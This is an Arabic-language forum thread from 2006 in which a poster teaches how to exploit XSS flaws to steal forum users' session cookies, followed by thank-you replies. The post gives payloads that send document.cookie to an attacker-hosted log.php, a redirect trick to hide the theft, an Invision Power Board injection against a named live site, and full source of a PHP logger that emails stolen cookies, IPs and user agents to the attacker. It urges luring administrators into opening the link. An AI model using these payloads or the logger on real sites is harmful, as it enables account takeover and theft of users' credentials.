شرح مبسط :استغلال اغلبيه ثغرات xss (درس مهم) + تطبيق

28-Feb-2006, 11:50 PM

السلام عليكم ورحمه الله وبركاته ,,

الان هذا اول درس لي بهذا القسم وهو يتكلم عن كيفيه استغلال ثغرات
xss

طيب نأتي الان الى الكود المهم في ثغرات xss

هذا كود سكربت خبيث يأتي بمعلومات الكوكيز تجده دائما ً في ثغرات xss

كود PHP:

  <Script>javascript:alert(****************)</Script>

الأن الكود هذا لم يكون بالثغره سوف يظهر لك الكوكيز تبعك وهو يحتوي على نقاط مهمه وهي :
1- رقم العضويه
2- الباسورد مشفر md5
3 - الباسورد مشفر Hash

ورقم الاستايل وغيره ,, على حسب نوعيه البرنامج المصاب!

طيب الحين وجدت هذا الكود سوف نربطه باللوج

ماهو اللوج ؟
اللوج هذا تربطه مع السكربت الذي ياتي بالكوكيز ,, وبعد ان تربطه كل من فتح السكربت وهو مربوط باللوج سوف يسجل معلومات الكوكيز تبعه باللوج او يرسل الى ايميلك ( على حسب اللوج )

طيب الان بعد ما ربطته اصبح الرابط :

كود PHP:

  <Script>location.href="http://www.xxxxx.com/log.php?id="+****************</Script>

تمام الان :
[فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات . إضغط هنا للتسجيل] = الموقع المربوط فيه اللوج
log.php = اسم ملف اللوج
طيب الحين نرفع اللوج على اي موقع عندك وبعد كذا تستبدل
[فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات . إضغط هنا للتسجيل] برابط اللوج الي عندك

المهم الان هذا السكربت اصبح جاهزا للاستعمال سوف نضعه بكود الثغره ونستبدل :

كود PHP:

  <Script>javascript:alert(****************)</Script>

بـــ

كود PHP:

  <Script>location.href="http://www.xxxxx.com/log.php?id="+****************</Script>

الان نخلي مثلا المدير العام او اي عضو تبي تسرق الكوكيز تبعه انه يفتح الرابط

بتقول كيف بقولك ياااولد انت وراااااسك(6) عاد بطريقتك خليه يفتح الرابط

طيب الحين بتقولي والله فضيحه يابو خالد لم اخليه يفتح الرابط يطلع عنده اللوج وبيكشفني

بقوله ولا يهمك اخوي نربطه كمان بموقع للتمويه

مثلا نربطه بموقع [فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات . إضغط هنا للتسجيل] بحيث انه لم يفتح الثغره والمربوط فيها اللوج وموقع جوجل راح يتحول اوتوماتيك الى جوجل وبكذا مايشك

بتقول كيف يابو خالد بقولك كذا نضع بعد رابط اللوج :
re=www.google.com&
بس
بحيث يكون بعد & يوجد id ... الخ
يعني يكون الكود :

كود PHP:

  <Script>location.href="http://www.xxxxx.com/log.php?re=www.google.com&id="+****************</Script>

طبعا انت استبدل [فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات . إضغط هنا للتسجيل] باي موقع تبغاه ويفضل يكون الموقع الي مصاب فيه الثغره (1)

طيب الحين تقول كذا تمام يابو خالد يالله عطنا مثااال

بعطيكم مثال لثغره الي اكتشفتها انا بمنتديات :Invision Power Board

الكود للثغره :

كود PHP:

  http://xxx.com/forums/index.php?act=idx='><script>alert(****************)</script>

احنا راح نستبدل :

كود PHP:

  <Script>javascript:alert(****************)</Script>

بـــ

كود PHP:

  <Script>location.href="http://www.xxxxx.com/log.php?re=www.google.com&id="+****************</Script>

واستبدل هنا موقع جوجل باي موقع تبغاه

ورابط اللوج [فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات . إضغط هنا للتسجيل] باللوج تبعك

====================
تطبيق :

التطبيق هنا :

كود PHP:

  http://www.maas1.com/vb/index.php?act=idx='><script>alert(****************)</script>

===================
اللوج :

كود PHP:

  <?php 

// Thnx For Security 4 Arab - [url]http://www.s4a.cc[/url] - [url]http://www.s4a.com/forum[/url] 

//----- S4a Logger v0.10 -----// 

// Star 

//Your Email --::-- 

$ToGet = "h- -تم حذف االبريد بواسطة الادارة _برجاء الالتزام بقوانين المنتديات مع الشكر _الادارة -"; 

//////////////////////////////// 

$Ip = $REMOTE_ADDR; 

$Sys = $HTTP_USER_AGENT; 

////////////////////////////////////////////// 

if($ToGet == ''){echo 'Edit Your Email Befor You Use Me !!'; exit();} 

// 

$Time = date("l dS of F Y h:i:s A"); 

 
$Hdr = 'From: Logger <logger@secourty>'; 

 
$Msg = ' 

Hi ,, Mr.Attacker :D 

------------------------------------------- 

- Thnx For S4a ,, Security For Arab Forum - 

- s4a                                     - 

- s4a froum                               - 

--------------------------------------------------------------------- 

- This Script Coded By Devil-00 [ Devil From Palestine ]            - 

- <devil- -تم حذف االبريد بواسطة الادارة _برجاء الالتزام بقوانين المنتديات مع الشكر _الادارة ->< -تم حذف االبريد بواسطة الادارة _برجاء الالتزام بقوانين المنتديات مع الشكر _الادارة ->< -تم حذف االبريد بواسطة الادارة _برجاء الالتزام بقوانين المنتديات مع الشكر _الادارة -> - 

--------------------------------------------------------------------- 

- IP         ::- [ ' .$Ip.'  ] 

- System     ::- [  '.$Sys.' ] 

- The ****** ::- [  '.$id.'  ] 

- Time       ::- [ '.$Time.' ] 

--------------------------------------------------------------------- 

- root@devil00 ~ ./evilcat /etc/passwd                              - 

- root@devil00 ~ ./s4acracker passwd --log <log.log> &&             - 

--------------------------------------------------------------------- 

'; 

$send = mail($ToGet,'S4a - [ New****** ]',$Msg,$Hdr); 

// 

/* Refresh code ,, By Devil-00 [  25/5/2005 ] << v0.10 */  

if(isset($_GET["re"])){ 

$Refresh = $_GET["re"]; 

if($Refresh == ""){ 

mail ($ToGet,'S4a - [Error]','Refresh Is Set And Its Empty !!',$Hdr); 

}else{ 

header("location:".$Refresh); 

} 

} 

// 

?>

استبدل هنا :

كود PHP:

  $ToGet = "h- -تم حذف االبريد بواسطة الادارة _برجاء الالتزام بقوانين المنتديات مع الشكر _الادارة -";

الايميل: h- -تم حذف االبريد بواسطة الادارة _برجاء الالتزام بقوانين المنتديات مع الشكر _الادارة -
بالايميل تبعك !

واحفظه بامتداد php طبعا افتح المفكره وحط الكود ولاتنسى تغير الايميل واحفظه بامتداد php
وارفعه على موقعك او على موقع لايكوس

وأخص بالشكر هنا لأخوي العزيز Devil-00 لبرمجته هذا اللوج الممتاز صراحه

================
ملاحظه * :

انا لم اضع التطبيق الا لانه درس عملي فقط لا أكثر ..

وبإمكانك استغلاله بثغره xss تبع cPanel ولاكنها اصبحت قديمه ورقعت ايضا على جميع المواقع ولاكن ليس هذه الثغره وحسب بل فيه كثيــر وكثير من الثغرات xss مليانه بمواقع السيكورتي

وغيرها من ثغرات xss

وتابعو قسم الكتب لاني سوف اضع كتاب شيق عن xss وفيه شفرات الـ hex التي تستخدم دائما في السكربتات الخبيثه وهي التي تطبق عن طريق المتصفح!

انتهى...

=====================

بعض الاكواد الظاهر تخرج لك على هيئه نجوم

**************

استبدل النجوم بالكلمه هذي

d o c u m e n t.c o o k i e

مع مراعات المسافات

يعني شيل المسافات بين الاحرف واستبدلها بالنجوم وبيصير تمام

كل شكــر لأخي

«®°·.¸.•°°·.¸¸.•°°·.¸.•°®»QptaN«®°·.¸.•°°·.¸¸.•°°· .¸.•°®»

01-Mar-2006, 09:06 AM

آخوي بوخالد

يعطيك العافية على الشرح

اعتذر لعدم تواجدي في المنتدى في الفترة الأخيرة لظروف

شرح ممتاز

بس طبعا كالعادة ما فهمت شي إلا معلومات بسيطة.....

أقول أخوي كويتي صخر ايش صار في الدورة >>>> منتظرها

ودمت بود

06-Mar-2006, 10:36 PM

كويتي صخر
اشكرك يالغالي على الشرح تشكرك ياوحش
تحياتي :)

07-Mar-2006, 09:06 PM

مشكوووووووووووووووووووووووووووووور

اخوي على هذا الموضوع الرائع مع جزيل الشكر

مــــــــــــــــــــــــــ التحيات ــــــــــــــــــــــــــــــــــــــــــــ ع

13-Mar-2006, 06:44 PM

يا اخي كويتي صخر صحيح انك محترف وانا اشهد لك والله الى الامام دائما في نحووور اعداء الاسلام

06-Apr-2006, 06:27 PM

الله يعطيك العافيه وماقصرت

13-Jun-2006, 03:43 PM

والله صعبه دروس الاختراق :(

04-Jan-2007, 07:59 PM

جزاك الله كل خير
رائع

07-Jan-2007, 02:10 AM

مشكور والله

17-Feb-2007, 12:55 AM

شكرا لك اخي الكريم
ما فهمت شي إلا معلومات بسيطة
رغم الشرح المفصل والامثلة
أعذرني انا مبتدأ
والله يصبرك علينا

27-Feb-2007, 08:49 AM

ممكن اتضيفني اخووي

[فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات . إضغط هنا للتسجيل]

02-Mar-2007, 03:00 AM

يعطيك العافية اخوي كويتي صخر على الشرح المميز


قريبا	قريبا	قريبا	قريبا